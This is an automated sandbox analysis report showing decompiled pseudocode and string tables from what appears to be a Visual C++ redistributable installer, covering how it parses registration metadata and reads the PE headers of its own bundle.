                                                                          • Opcode Fuzzy Hash: 91961c8120eddbfad48e5d8cba0f6eebf39225c92b7e81d283dbaa2cb8509e65
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 67%
                                                                          			E000BF86E(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				short* _v16;
                                                                          				void* _v20;
                                                                          				void* _t88;
                                                                          				void* _t112;
                                                                          				int _t158;
                                                                          				void* _t164;
                                                                          				signed int _t166;
                                                                          				intOrPtr* _t167;
                                                                          				intOrPtr* _t168;
                                                                          				intOrPtr* _t169;
                                                                          				void* _t174;
                                                                          				intOrPtr _t176;
                                                                          				void* _t179;
                                                                          				void* _t188;
                                                                          				void* _t190;
                                                                          
                                                                          				_t174 = __edx;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_t88 = E000F388A(_a8, L"Registration",  &_v12);
                                                                          				_t164 = 0x80070490;
                                                                          				_t179 =  ==  ? 0x80070490 : _t88;
                                                                          				if(_t179 >= 0) {
                                                                          					_push(__edi);
                                                                          					_t176 = _a4;
                                                                          					_t8 = _t176 + 0x10; // 0xb534d
                                                                          					if(E000F31C7(_v12, L"Id", _t8) >= 0) {
                                                                          						_t10 = _t176 + 0x14; // 0xb5351
                                                                          						if(E000F31C7(_v12, L"Tag", _t10) >= 0) {
                                                                          							if(E000BE936(_t176, _t176, _a8) >= 0) {
                                                                          								if(E000F31C7(_v12, L"Version",  &_v16) >= 0) {
                                                                          									_t15 = _t176 + 0x38; // 0xb5375
                                                                          									if(E000F4B5A(_t174, _v16, 0, _t15) >= 0) {
                                                                          										_t18 = _t176 + 0x44; // 0xb5381
                                                                          										if(E000F31C7(_v12, L"ProviderKey", _t18) >= 0) {
                                                                          											_t20 = _t176 + 0x48; // 0xb5385
                                                                          											if(E000F31C7(_v12, L"ExecutableName", _t20) >= 0) {
                                                                          												if(E000F33DB(_t166, _v12, L"PerMachine", _t176) >= 0) {
                                                                          													_t188 = E000F388A(_v12, L"Arp",  &_v8);
                                                                          													if(_t188 == 1) {
                                                                          														L71:
                                                                          														_t62 = _t176 + 0x98; // 0xb53d5
                                                                          														_t63 = _t176 + 0x94; // 0xb53d1
                                                                          														if(E000BEBB2(_v12, _t63, _t62) >= 0) {
                                                                          															_t190 = E000F388A(_v12, L"Update",  &_v20);
                                                                          															if(_t190 == 1) {
                                                                          																L88:
                                                                          																_t112 = E000BEFE5(_t166, _t176); // executed
                                                                          																_t190 = _t112;
                                                                          																if(_t190 >= 0) {
                                                                          																	L91:
                                                                          																	L92:
                                                                          																	_t167 = _v12;
                                                                          																	if(_t167 != 0) {
                                                                          																		 *((intOrPtr*)( *_t167 + 8))(_t167);
                                                                          																	}
                                                                          																	_t168 = _v8;
                                                                          																	if(_t168 != 0) {
                                                                          																		 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                                          																	}
                                                                          																	_t169 = _v20;
                                                                          																	if(_t169 != 0) {
                                                                          																		 *((intOrPtr*)( *_t169 + 8))(_t169);
                                                                          																	}
                                                                          																	if(_v16 != 0) {
                                                                          																		E000F54EF(_v16);
                                                                          																	}
                                                                          																	return _t190;
                                                                          																}
                                                                          																_push("Failed to set registration paths.");
                                                                          																L90:
                                                                          																_push(_t190);
                                                                          																E000F012F();
                                                                          																goto L91;
                                                                          															}
                                                                          															if(_t190 >= 0) {
                                                                          																 *((intOrPtr*)(_t176 + 0x9c)) = 1;
                                                                          																_t68 = _t176 + 0xa0; // 0xb53dd
                                                                          																_t190 = E000F31C7(_v20, L"Manufacturer", _t68);
                                                                          																if(_t190 >= 0) {
                                                                          																	_t70 = _t176 + 0xa4; // 0xb53e1
                                                                          																	_t190 = E000F31C7(_v20, L"Department", _t70);
                                                                          																	if(_t190 == _t164 || _t190 >= 0) {
                                                                          																		_t72 = _t176 + 0xa8; // 0xb53e5
                                                                          																		_t190 = E000F31C7(_v20, L"ProductFamily", _t72);
                                                                          																		if(_t190 == _t164 || _t190 >= 0) {
                                                                          																			_t74 = _t176 + 0xac; // 0xb53e9
                                                                          																			_t190 = E000F31C7(_v20, L"Name", _t74);
                                                                          																			if(_t190 >= 0) {
                                                                          																				_t76 = _t176 + 0xb0; // 0xb53ed
                                                                          																				_t190 = E000F31C7(_v20, L"Classification", _t76);
                                                                          																				if(_t190 >= 0) {
                                                                          																					goto L88;
                                                                          																				}
                                                                          																				_push("Failed to get @Classification.");
                                                                          																				goto L90;
                                                                          																			}
                                                                          																			_push("Failed to get @Name.");
                                                                          																		} else {
                                                                          																			_push("Failed to get @ProductFamily.");
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push("Failed to get @Department.");
                                                                          																	}
                                                                          																	goto L90;
                                                                          																}
                                                                          																_push("Failed to get @Manufacturer.");
                                                                          																goto L90;
                                                                          															}
                                                                          															_push("Failed to select Update node.");
                                                                          															goto L90;
                                                                          														}
                                                                          														_push("Failed to parse software tag.");
                                                                          														goto L90;
                                                                          													}
                                                                          													if(_t188 >= 0) {
                                                                          														_t25 = _t176 + 4; // 0xb5341
                                                                          														_t190 = E000F33DB(_t166, _v8, L"Register", _t25);
                                                                          														if(_t190 >= 0) {
                                                                          															_t27 = _t176 + 0x60; // 0xb539d
                                                                          															_t190 = E000F31C7(_v8, L"DisplayName", _t27);
                                                                          															if(_t190 == 0x80070490 || _t190 >= 0) {
                                                                          																_t29 = _t176 + 0x64; // 0xb53a1
                                                                          																_t190 = E000F31C7(_v8, L"DisplayVersion", _t29);
                                                                          																if(_t190 == _t164 || _t190 >= 0) {
                                                                          																	_t31 = _t176 + 0x68; // 0xb53a5
                                                                          																	_t190 = E000F31C7(_v8, L"Publisher", _t31);
                                                                          																	if(_t190 == _t164 || _t190 >= 0) {
                                                                          																		_t33 = _t176 + 0x6c; // 0xb53a9
                                                                          																		_t190 = E000F31C7(_v8, L"HelpLink", _t33);
                                                                          																		if(_t190 == _t164 || _t190 >= 0) {
                                                                          																			_t35 = _t176 + 0x70; // 0xb53ad
                                                                          																			_t190 = E000F31C7(_v8, L"HelpTelephone", _t35);
                                                                          																			if(_t190 == _t164 || _t190 >= 0) {
                                                                          																				_t37 = _t176 + 0x74; // 0xb53b1
                                                                          																				_t190 = E000F31C7(_v8, L"AboutUrl", _t37);
                                                                          																				if(_t190 == _t164 || _t190 >= 0) {
                                                                          																					_t39 = _t176 + 0x78; // 0xb53b5
                                                                          																					_t190 = E000F31C7(_v8, L"UpdateUrl", _t39);
                                                                          																					if(_t190 == _t164 || _t190 >= 0) {
                                                                          																						_t41 = _t176 + 0x7c; // 0xb53b9
                                                                          																						_t190 = E000F31C7(_v8, L"ParentDisplayName", _t41);
                                                                          																						if(_t190 == _t164 || _t190 >= 0) {
                                                                          																							_t43 = _t176 + 0x80; // 0xb53bd
                                                                          																							_t190 = E000F31C7(_v8, L"Comments", _t43);
                                                                          																							if(_t190 == _t164 || _t190 >= 0) {
                                                                          																								_t45 = _t176 + 0x84; // 0xb53c1
                                                                          																								_t190 = E000F31C7(_v8, L"Contact", _t45);
                                                                          																								if(_t190 == _t164 || _t190 >= 0) {
                                                                          																									_t190 = E000F31C7(_v8, L"DisableModify",  &_v16);
                                                                          																									if(_t190 < 0) {
                                                                          																										if(_t190 == _t164) {
                                                                          																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
                                                                          																											_t190 = 0;
                                                                          																										}
                                                                          																										L65:
                                                                          																										if(_t190 >= 0) {
                                                                          																											_t59 = _t176 + 0x90; // 0xb53cd
                                                                          																											_t190 = E000F33DB(_t166, _v8, L"DisableRemove", _t59);
                                                                          																											if(_t190 == _t164) {
                                                                          																												goto L71;
                                                                          																											}
                                                                          																											if(_t190 >= 0) {
                                                                          																												 *(_t176 + 0x8c) = 1;
                                                                          																												goto L71;
                                                                          																											}
                                                                          																											_push("Failed to get @DisableRemove.");
                                                                          																											goto L90;
                                                                          																										}
                                                                          																										_push("Failed to get @DisableModify.");
                                                                          																										goto L90;
                                                                          																									}
                                                                          																									_t158 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"button", 0xffffffff);
                                                                          																									_t166 = 2;
                                                                          																									if(_t158 != _t166) {
                                                                          																										if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"yes", 0xffffffff) != 2) {
                                                                          																											if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"no", 0xffffffff) != 2) {
                                                                          																												_t190 = 0x8000ffff;
                                                                          																												E000B37D3(_t160, "registration.cpp", 0xf6, 0x8000ffff);
                                                                          																												_push(_v16);
                                                                          																												_push("Invalid modify disabled type: %ls");
                                                                          																												L62:
                                                                          																												_push(_t190);
                                                                          																												E000F012F();
                                                                          																												goto L91;
                                                                          																											}
                                                                          																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
                                                                          																											L60:
                                                                          																											_t164 = 0x80070490;
                                                                          																											goto L65;
                                                                          																										}
                                                                          																										 *(_t176 + 0x88) = 1;
                                                                          																										goto L60;
                                                                          																									}
                                                                          																									 *(_t176 + 0x88) = _t166;
                                                                          																									goto L60;
                                                                          																								} else {
                                                                          																									_push("Failed to get @Contact.");
                                                                          																									goto L90;
                                                                          																								}
                                                                          																							} else {
                                                                          																								_push("Failed to get @Comments.");
                                                                          																								goto L90;
                                                                          																							}
                                                                          																						} else {
                                                                          																							_push("Failed to get @ParentDisplayName.");
                                                                          																							goto L90;
                                                                          																						}
                                                                          																					} else {
                                                                          																						_push("Failed to get @UpdateUrl.");
                                                                          																						goto L90;
                                                                          																					}
                                                                          																				} else {
                                                                          																					_push("Failed to get @AboutUrl.");
                                                                          																					goto L90;
                                                                          																				}
                                                                          																			} else {
                                                                          																				_push("Failed to get @HelpTelephone.");
                                                                          																				goto L90;
                                                                          																			}
                                                                          																		} else {
                                                                          																			_push("Failed to get @HelpLink.");
                                                                          																			goto L90;
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push("Failed to get @Publisher.");
                                                                          																		goto L90;
                                                                          																	}
                                                                          																} else {
                                                                          																	_push("Failed to get @DisplayVersion.");
                                                                          																	goto L90;
                                                                          																}
                                                                          															} else {
                                                                          																_push("Failed to get @DisplayName.");
                                                                          																goto L90;
                                                                          															}
                                                                          														}
                                                                          														_push("Failed to get @Register.");
                                                                          														goto L90;
                                                                          													}
                                                                          													_push("Failed to select ARP node.");
                                                                          													goto L90;
                                                                          												}
                                                                          												_push("Failed to get @PerMachine.");
                                                                          												goto L90;
                                                                          											}
                                                                          											_push("Failed to get @ExecutableName.");
                                                                          											goto L90;
                                                                          										}
                                                                          										_push("Failed to get @ProviderKey.");
                                                                          										goto L90;
                                                                          									}
                                                                          									_push(_v16);
                                                                          									_push("Failed to parse @Version: %ls");
                                                                          									goto L62;
                                                                          								}
                                                                          								_push("Failed to get @Version.");
                                                                          								goto L90;
                                                                          							}
                                                                          							_push("Failed to parse related bundles");
                                                                          							goto L90;
                                                                          						}
                                                                          						_push("Failed to get @Tag.");
                                                                          						goto L90;
                                                                          					}
                                                                          					_push("Failed to get @Id.");
                                                                          					goto L90;
                                                                          				}
                                                                          				_push("Failed to select registration node.");
                                                                          				_push(_t179);
                                                                          				E000F012F();
                                                                          				goto L92;
                                                                          			}




















                                                                          0x000bfa3a
                                                                          0x000bfa3e
                                                                          0x000bfa4e
                                                                          0x000bfa5f
                                                                          0x000bfa63
                                                                          0x000bfa73
                                                                          0x000bfa84
                                                                          0x000bfa88
                                                                          0x000bfa98
                                                                          0x000bfaa9
                                                                          0x000bfaad
                                                                          0x000bfabd
                                                                          0x000bface
                                                                          0x000bfad2
                                                                          0x000bfae2
                                                                          0x000bfaf3
                                                                          0x000bfaf7
                                                                          0x000bfb07
                                                                          0x000bfb18
                                                                          0x000bfb1c
                                                                          0x000bfb2c
                                                                          0x000bfb40
                                                                          0x000bfb44
                                                                          0x000bfb54
                                                                          0x000bfb68
                                                                          0x000bfb6c
                                                                          0x000bfb8d
                                                                          0x000bfb91
                                                                          0x000bfc33
                                                                          0x000bfc35
                                                                          0x000bfc3c
                                                                          0x000bfc3c
                                                                          0x000bfc3e
                                                                          0x000bfc40
                                                                          0x000bfc4c
                                                                          0x000bfc60
                                                                          0x000bfc64
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000bfc68
                                                                          0x000bfc74
                                                                          0x00000000
                                                                          0x000bfc74
                                                                          0x000bfc6a
                                                                          0x00000000
                                                                          0x000bfc6a
                                                                          0x000bfc42
                                                                          0x00000000
                                                                          0x000bfc42
                                                                          0x000bfbad
                                                                          0x000bfbb1
                                                                          0x000bfbb4
                                                                          0x000bfbd3
                                                                          0x000bfbf6
                                                                          0x000bfc06
                                                                          0x000bfc16
                                                                          0x000bfc1b
                                                                          0x000bfc1e
                                                                          0x000bfc23
                                                                          0x000bfc23
                                                                          0x000bfc24
                                                                          0x00000000
                                                                          0x000bfc29
                                                                          0x000bfbf8
                                                                          0x000bfbff
                                                                          0x000bfbff
                                                                          0x00000000
                                                                          0x000bfbff
                                                                          0x000bfbd5
                                                                          0x00000000
                                                                          0x000bfbd5
                                                                          0x000bfbb6
                                                                          0x00000000
                                                                          0x000bfb72
                                                                          0x000bfb72
                                                                          0x00000000
                                                                          0x000bfb72
                                                                          0x000bfb4a
                                                                          0x000bfb4a
                                                                          0x00000000
                                                                          0x000bfb4a
                                                                          0x000bfb22
                                                                          0x000bfb22
                                                                          0x00000000
                                                                          0x000bfb22
                                                                          0x000bfafd
                                                                          0x000bfafd
                                                                          0x00000000
                                                                          0x000bfafd
                                                                          0x000bfad8
                                                                          0x000bfad8
                                                                          0x00000000
                                                                          0x000bfad8
                                                                          0x000bfab3
                                                                          0x000bfab3
                                                                          0x00000000
                                                                          0x000bfab3
                                                                          0x000bfa8e
                                                                          0x000bfa8e
                                                                          0x00000000
                                                                          0x000bfa8e
                                                                          0x000bfa69
                                                                          0x000bfa69
                                                                          0x00000000
                                                                          0x000bfa69
                                                                          0x000bfa44
                                                                          0x000bfa44
                                                                          0x00000000
                                                                          0x000bfa44
                                                                          0x000bfa1f
                                                                          0x000bfa1f
                                                                          0x00000000
                                                                          0x000bfa1f
                                                                          0x000bfa19
                                                                          0x000bf9fa
                                                                          0x00000000
                                                                          0x000bf9fa
                                                                          0x000bf9d9
                                                                          0x00000000
                                                                          0x000bf9d9
                                                                          0x000bf9af
                                                                          0x00000000
                                                                          0x000bf9af
                                                                          0x000bf991
                                                                          0x00000000
                                                                          0x000bf991
                                                                          0x000bf970
                                                                          0x00000000
                                                                          0x000bf970
                                                                          0x000bf94c
                                                                          0x000bf94f
                                                                          0x00000000
                                                                          0x000bf94f
                                                                          0x000bf92e
                                                                          0x00000000
                                                                          0x000bf92e
                                                                          0x000bf90d
                                                                          0x00000000
                                                                          0x000bf90d
                                                                          0x000bf8f4
                                                                          0x00000000
                                                                          0x000bf8f4
                                                                          0x000bf8d3
                                                                          0x00000000
                                                                          0x000bf8d3
                                                                          0x000bf8a6
                                                                          0x000bf8ab
                                                                          0x000bf8ac
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                          • API String ID: 0-2956246334
                                                                          • Opcode ID: b57f6848b11b3f5b13518d34441e4fad7f29634ea7a0b287e0928737c927022d
                                                                          • Instruction ID: 5fc0d749ff508c23d9585d3972cf71732b82a910425e10a7c2c734e34e487dc5
                                                                          • Opcode Fuzzy Hash: b57f6848b11b3f5b13518d34441e4fad7f29634ea7a0b287e0928737c927022d
                                                                          • Instruction Fuzzy Hash: 4EE1B632E8076BBBCB22A6A0CC42EFD7AA5BB04760F514275FD50B76D1D7E15E40A780
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          [Figure: control-flow graph, entry block bb389-bb3fd; legend: Executed / Not Executed]
                                                                          C-Code - Quality: 67%
                                                                          			E000BB389(union _LARGE_INTEGER* __edx, void* _a4, void* _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				union _LARGE_INTEGER _v12;
                                                                          				void _v72;
                                                                          				signed short _v300;
                                                                          				signed int _v314;
                                                                          				void _v320;
                                                                          				union _LARGE_INTEGER _v340;
                                                                          				long _v344;
                                                                          				void _v360;
                                                                          				long _v364;
                                                                          				union _LARGE_INTEGER* _v368;
                                                                          				intOrPtr _v372;
                                                                          				void _v376;
                                                                          				void _v380;
                                                                          				struct _OVERLAPPED* _v384;
                                                                          				intOrPtr _v388;
                                                                          				union _LARGE_INTEGER _v392;
                                                                          				intOrPtr _v396;
                                                                          				char _v400;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t98;
                                                                          				intOrPtr _t106;
                                                                          				int _t108;
                                                                          				int _t117;
                                                                          				int _t120;
                                                                          				union _LARGE_INTEGER _t123;
                                                                          				int _t124;
                                                                          				int _t133;
                                                                          				signed short _t137;
                                                                          				intOrPtr* _t142;
                                                                          				int _t151;
                                                                          				intOrPtr _t160;
                                                                          				signed short _t188;
                                                                          				signed short _t191;
                                                                          				signed short _t196;
                                                                          				signed short _t199;
                                                                          				signed short _t202;
                                                                          				signed short _t205;
                                                                          				signed short _t208;
                                                                          				signed short _t211;
                                                                          				signed short _t214;
                                                                          				signed short _t217;
                                                                          				signed short _t220;
                                                                          				signed int _t224;
                                                                          				void* _t226;
                                                                          				intOrPtr _t237;
                                                                          				void _t241;
                                                                          				intOrPtr _t242;
                                                                          				union _LARGE_INTEGER* _t243;
                                                                          				void* _t244;
                                                                          				void* _t247;
                                                                          				void* _t248;
                                                                          				void* _t252;
                                                                          				signed int _t290;
                                                                          
                                                                          				_t243 = __edx;
                                                                          				_t98 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t98 ^ _t290;
                                                                          				_t223 = _a4;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				_v364 = 0;
                                                                          				asm("movlpd [ebp-0x18c], xmm0");
                                                                          				E000DF670(_t244,  &_v72, 0, 0x40);
                                                                          				E000DF670(_t244,  &_v320, 0, 0xf8);
                                                                          				_v376 = 0;
                                                                          				_v380 = 0;
                                                                          				_v368 = 0;
                                                                          				_t224 = 0xa;
                                                                          				memset( &_v360, 0, _t224 << 2);
                                                                          				_t226 = _a8;
                                                                          				 *_t223 = _t226;
                                                                          				if(_t226 != 0xffffffff) {
                                                                          					_t106 = _a12;
                                                                          					_t247 = SetFilePointerEx;
                                                                          					_push(0);
                                                                          					_t107 =  ==  ? _t226 : _t106;
                                                                          					 *((intOrPtr*)(_t223 + 4)) =  ==  ? _t226 : _t106;
                                                                          					_t108 = SetFilePointerEx(_t226, 0, 0, 0); // executed
                                                                          					if(_t108 != 0) {
                                                                          						_t111 = ReadFile( *_t223,  &_v72, 0x40,  &_v364, 0); // executed
                                                                          						if(_t111 != 0) {
                                                                          							if(_v364 < 0x40) {
                                                                          								L66:
                                                                          								_t247 = 0x8007000d;
                                                                          								_t252 = 0x8007000d;
                                                                          								E000B37D3(_t111, "section.cpp", 0x4e, 0x8007000d);
                                                                          								_push("Failed to find valid DOS image header in buffer.");
                                                                          								L67:
                                                                          								_push(_t247);
                                                                          								goto L68;
                                                                          							}
                                                                          							_t111 = 0x5a4d;
                                                                          							if(0x5a4d != _v72) {
                                                                          								goto L66;
                                                                          							}
                                                                          							_push(0);
                                                                          							asm("cdq");
                                                                          							_t117 = SetFilePointerEx( *_t223, _v12.LowPart, _t243, 0); // executed
                                                                          							if(_t117 != 0) {
                                                                          								_t120 = ReadFile( *_t223,  &_v320, 0x18,  &_v364, 0); // executed
                                                                          								if(_t120 != 0) {
                                                                          									if(_v364 < 0x18 || _v320 != 0x4550) {
                                                                          										_t247 = 0x8007000d;
                                                                          										_t252 = 0x8007000d;
                                                                          										E000B37D3(_t120, "section.cpp", 0x64, 0x8007000d);
                                                                          										_push("Failed to find valid NT image header in buffer.");
                                                                          										goto L67;
                                                                          									} else {
                                                                          										_t24 = _v12.LowPart + 0x58; // 0x58
                                                                          										_t123 = _v12.LowPart + 0x98;
                                                                          										_v388 = _t24;
                                                                          										_push(0);
                                                                          										_v392.LowPart = _t123;
                                                                          										_t124 = SetFilePointerEx( *_t223, _t123, 0, 0); // executed
                                                                          										if(_t124 != 0) {
                                                                          											if(ReadFile( *_t223,  &_v376, 4,  &_v364, 0) != 0) {
                                                                          												if(ReadFile( *_t223,  &_v380, 4,  &_v364, 0) != 0) {
                                                                          													_push(0);
                                                                          													_t133 = SetFilePointerEx( *_t223, _v12 + (_v300 & 0x0000ffff) + 0x18, 0, 0); // executed
                                                                          													if(_t133 != 0) {
                                                                          														_t247 = 0;
                                                                          														_v384 = 0;
                                                                          														if(ReadFile( *_t223,  &_v360, 0x28,  &_v364, 0) == 0) {
                                                                          															L63:
                                                                          															_t137 = GetLastError();
                                                                          															_t255 =  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
                                                                          															_t252 =  >=  ? 0x80004005 :  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
                                                                          															E000B37D3(0x80004005, "section.cpp", 0x8d, _t252);
                                                                          															_push(_t247);
                                                                          															_push("Failed to read image section header, index: %u");
                                                                          															_push(_t252);
                                                                          															L64:
                                                                          															E000F012F();
                                                                          															goto L69;
                                                                          														}
                                                                          														_t237 = 1;
                                                                          														while(_v364 >= 0x28) {
                                                                          															_t142 =  &_v360;
                                                                          															if( *_t142 != 0x7869772e ||  *((intOrPtr*)(_t142 + 4)) != 0x6e727562) {
                                                                          																_t143 = _v314 & 0x0000ffff;
                                                                          																if(_t237 >= (_v314 & 0x0000ffff)) {
                                                                          																	_t248 = 0x8007000d;
                                                                          																	_t252 = 0x8007000d;
                                                                          																	E000B37D3(_t143, "section.cpp", 0xa0, 0x8007000d);
                                                                          																	_push("Failed to find Burn section.");
                                                                          																	goto L57;
                                                                          																}
                                                                          																_t247 = _t247 + 1;
                                                                          																_v384 = _t247;
                                                                          																_v372 = _t237 + 1;
                                                                          																if(ReadFile( *_t223,  &_v360, 0x28,  &_v364, 0) == 0) {
                                                                          																	goto L63;
                                                                          																}
                                                                          																_t237 = _v372;
                                                                          																continue;
                                                                          															} else {
                                                                          																if(_v344 >= 0x34) {
                                                                          																	_t247 = E000B38D4(_v344, 1);
                                                                          																	_v368 = _t247;
                                                                          																	if(_t247 != 0) {
                                                                          																		_push(0);
                                                                          																		_t151 = SetFilePointerEx( *_t223, _v340.LowPart, 0, 0); // executed
                                                                          																		if(_t151 != 0) {
                                                                          																			_v372 = _v340 + 0x1c;
                                                                          																			if(ReadFile( *_t223, _t247, _v344,  &_v364, 0) != 0) {
                                                                          																				_t156 = _v344;
                                                                          																				if(_v344 <= _v364) {
                                                                          																					if( *((intOrPtr*)(_t247 + 4)) == 2) {
                                                                          																						if(E000F48CB(_t237,  *((intOrPtr*)(_t223 + 4)),  &_v400) >= 0) {
                                                                          																							_t243 =  *(_t247 + 0x18);
                                                                          																							 *(_t223 + 8) = _t243;
                                                                          																							if( *((intOrPtr*)(_t247 + 0x20)) == 0) {
                                                                          																								_t241 = _v376;
                                                                          																								if(_t241 == 0) {
                                                                          																									_t160 =  *((intOrPtr*)(_t247 + 0x30)) + _t243;
                                                                          																								} else {
                                                                          																									_t160 = _v380 + _t241;
                                                                          																								}
                                                                          																							} else {
                                                                          																								_t160 =  *((intOrPtr*)(_t247 + 0x24)) +  *((intOrPtr*)(_t247 + 0x20));
                                                                          																							}
                                                                          																							 *((intOrPtr*)(_t223 + 0xc)) = _t160;
                                                                          																							 *((intOrPtr*)(_t223 + 0x10)) = _v400;
                                                                          																							 *((intOrPtr*)(_t223 + 0x14)) = _v396;
                                                                          																							 *((intOrPtr*)(_t223 + 0x18)) = _v388;
                                                                          																							 *(_t223 + 0x1c) = _v392;
                                                                          																							 *((intOrPtr*)(_t223 + 0x20)) = _v372;
                                                                          																							 *((intOrPtr*)(_t223 + 0x24)) =  *((intOrPtr*)(_t247 + 0x1c));
                                                                          																							 *((intOrPtr*)(_t223 + 0x28)) =  *((intOrPtr*)(_t247 + 0x20));
                                                                          																							 *((intOrPtr*)(_t223 + 0x2c)) =  *((intOrPtr*)(_t247 + 0x24));
                                                                          																							 *((intOrPtr*)(_t223 + 0x30)) =  *((intOrPtr*)(_t247 + 0x28));
                                                                          																							 *(_t223 + 0x34) =  *(_t247 + 0x2c);
                                                                          																							_t242 = E000B38D4( *(_t247 + 0x2c) << 2, 1);
                                                                          																							 *((intOrPtr*)(_t223 + 0x38)) = _t242;
                                                                          																							if(_t242 != 0) {
                                                                          																								_t93 = _t247 + 0x30; // 0x30
                                                                          																								E000DF0F0(_t242, _t93,  *(_t223 + 0x34) << 2);
                                                                          																								_t94 = _t247 + 8; // 0x8
                                                                          																								_t252 = E000BB106(_t94);
                                                                          																								if(_t252 >= 0) {
                                                                          																									goto L59;
                                                                          																								}
                                                                          																								E000B37D3(_t178, "section.cpp", 0xf5, _t252);
                                                                          																								_push("PE Header from file didn\'t match PE Header in memory.");
                                                                          																								L37:
                                                                          																								_push(_t252);
                                                                          																								goto L38;
                                                                          																							} else {
                                                                          																								_t223 = 0x8007000e;
                                                                          																								_t252 = 0x8007000e;
                                                                          																								E000B37D3(_t172, "section.cpp", 0xef, 0x8007000e);
                                                                          																								_push("Failed to allocate memory for container sizes.");
                                                                          																								_push(0x8007000e);
                                                                          																								L38:
                                                                          																								E000F012F();
                                                                          																								L58:
                                                                          																								L59:
                                                                          																								if(_t247 != 0) {
                                                                          																									E000B3999(_t247);
                                                                          																								}
                                                                          																								goto L69;
                                                                          																							}
                                                                          																						}
                                                                          																						_push("Failed to get total size of bundle.");
                                                                          																						goto L37;
                                                                          																					}
                                                                          																					_t252 = 0x8007000d;
                                                                          																					E000B37D3(_t156, "section.cpp", 0xcc, 0x8007000d);
                                                                          																					E000F012F(0x8007000d, "Failed to read section info, unsupported version: %08x", _v368->LowPart.HighPart);
                                                                          																					_t247 = _v368;
                                                                          																					goto L59;
                                                                          																				}
                                                                          																				_t248 = 0x8007000d;
                                                                          																				_t252 = 0x8007000d;
                                                                          																				E000B37D3(_t156, "section.cpp", 0xc5, 0x8007000d);
                                                                          																				_push("Failed to read complete section info.");
                                                                          																				L57:
                                                                          																				_push(_t248);
                                                                          																				E000F012F();
                                                                          																				_t247 = _v368;
                                                                          																				goto L58;
                                                                          																			}
                                                                          																			_t188 = GetLastError();
                                                                          																			_t259 =  <=  ? _t188 : _t188 & 0x0000ffff | 0x80070000;
                                                                          																			_t252 =  >=  ? 0x80004005 :  <=  ? _t188 : _t188 & 0x0000ffff | 0x80070000;
                                                                          																			E000B37D3(0x80004005, "section.cpp", 0xc0, _t252);
                                                                          																			_push("Failed to read section info.");
                                                                          																			goto L37;
                                                                          																		}
                                                                          																		_t191 = GetLastError();
                                                                          																		_t262 =  <=  ? _t191 : _t191 & 0x0000ffff | 0x80070000;
                                                                          																		_t252 =  >=  ? 0x80004005 :  <=  ? _t191 : _t191 & 0x0000ffff | 0x80070000;
                                                                          																		E000B37D3(0x80004005, "section.cpp", 0xb7, _t252);
                                                                          																		_push("Failed to seek to section info.");
                                                                          																		goto L37;
                                                                          																	}
                                                                          																	_t223 = 0x8007000e;
                                                                          																	_t252 = 0x8007000e;
                                                                          																	E000B37D3(_t149, "section.cpp", 0xb1, 0x8007000e);
                                                                          																	_push("Failed to allocate buffer for section info.");
                                                                          																	_push(0x8007000e);
                                                                          																	goto L68;
                                                                          																}
                                                                          																_t247 = 0x8007000d;
                                                                          																_t252 = 0x8007000d;
                                                                          																E000B37D3(_t142, "section.cpp", 0xac, 0x8007000d);
                                                                          																_push(_v344);
                                                                          																_push("Failed to read section info, data to short: %u");
                                                                          																L62:
                                                                          																_push(_t247);
                                                                          																goto L64;
                                                                          															}
                                                                          														}
